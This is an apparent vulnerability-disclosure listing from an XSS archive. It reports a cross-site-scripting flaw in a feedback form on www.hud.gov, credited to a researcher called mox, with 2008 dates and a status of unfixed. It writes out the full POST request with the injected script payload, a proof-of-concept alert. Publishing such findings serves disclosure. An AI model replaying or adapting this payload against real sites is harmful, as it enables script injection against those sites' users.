Security researcher mox, has submitted on 06/03/2008 a cross-site-scripting (XSS) vulnerability affecting www.hud.gov, which at the time of submission ranked 20157 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/03/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 06/03/2008 |
Date published: 07/03/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: mox |
Domain: www.hud.gov |
Category: XSS |
Pagerank: 20157 |
URL: http://www.hud.gov/utilities/send/sendlink.cfm |
POST: recipientemail=%3C%2Fblockquote%3E%3Cscript%3E+alert%28%27mox%27%29%3B%3C%2Fscript%3E&recipientemail _required=Please+type+an+e-mail+address+for+at+least+one+recipient&senderemail=%22%3F%3E&comments=&s enderemail_required=Please+verify+that+the+sender%27s+%28your%29+e-mail+address+is+correct&pagetosen d=http%3A%2F%2Fwww.hud.gov%2Frenting%2Findex.cfm&mailpage=Send |
Click here to view the mirror
|
|
|